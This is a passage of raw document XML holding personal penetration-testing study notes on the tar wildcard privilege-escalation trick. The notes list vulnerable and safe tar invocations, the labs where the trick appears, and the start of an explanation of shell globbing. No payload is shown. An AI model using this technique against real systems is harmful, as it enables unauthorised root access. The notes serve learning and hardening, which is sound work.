    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002532">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2286000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="536" name="image521.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image521.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId784"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943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2533">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002534">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In both writeups I read, they both mentioned this hacktricks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002535">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId785">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/wildcards-spare-tricks.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002536">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002537">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002538">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—--------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002539">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5vfkyewr45j3" w:id="326"/>
      <w:bookmarkEnd w:id="326"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash Gobbling or Linux tar wildcard (globbing)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000253A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Quick explanation of it: </w:t>
      </w:r>
      <w:hyperlink r:id="rId786">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@polygonben/linux-privilege-escalation-wildcards-with-tar-f79ab9e407fa</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000253B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000253C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000253D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="608"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-C .157</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000253E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="608"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId787">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Cockpit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000253F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="608"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId788">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Readys</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540">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="608"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play Amaterasu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002541">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002542">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002543">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some quick facts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002544">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="852"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the specific tar mode flag (czf, -zxf, etc.) doesn’t matter for the wildcard/globbing exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002545">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002546">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002547">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable vs. non-vulnerable (safe):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002548">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1400"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002549">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1400"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar czf /tmp/backup.tar.gz *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000254A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1400"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar -zxf /tmp/backup.tar.gz /opt/admin/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000254B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1400"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this case, you have to put the "--" files in /opt/admin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000254C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1400"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar czf out.tgz some/dir/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000254D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1400"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Generally safe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000254E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1400"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar czf /tmp/backup.tar.gz -- * ← -- stops option parsing of later --… filenames</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000254F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1400"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar czf /tmp/backup.tar.gz . ← no glob; tar walks the tree itself</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002550">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1400"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar -C /path -czf /tmp/backup.tar.gz .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002551">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1400"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find . -print0 | tar --null -T - -czf /tmp/backup.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002552">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1400"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Quote to avoid globbing by the shell (e.g., '*'), though that usually defeats the intent of including files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002553">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002554">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002555">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4305300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="183" name="image186.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image186.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId789"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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2556">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002557">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We also saw this in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tib3rius Cron Jobs video</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002558">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3762375" cy="733425"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="180" name="image173.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image173.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId790"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3762375" cy="733425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002559">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="840"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was a file ran by cron job</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000255A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000255B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is how they explained it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000255C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000255D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wildcard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000255E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="481"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When a wildcard character (*) is provided to a command as part of an argument, the shell will first perform filename expansion (also known as globbing) on the wildcard.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000255F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="481"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This process replaces the wildcard with a space-separated list of the file and directory names in the current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002560">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="481"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">An easy way to see this in action is to run the following command from your home directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002561">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="481"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
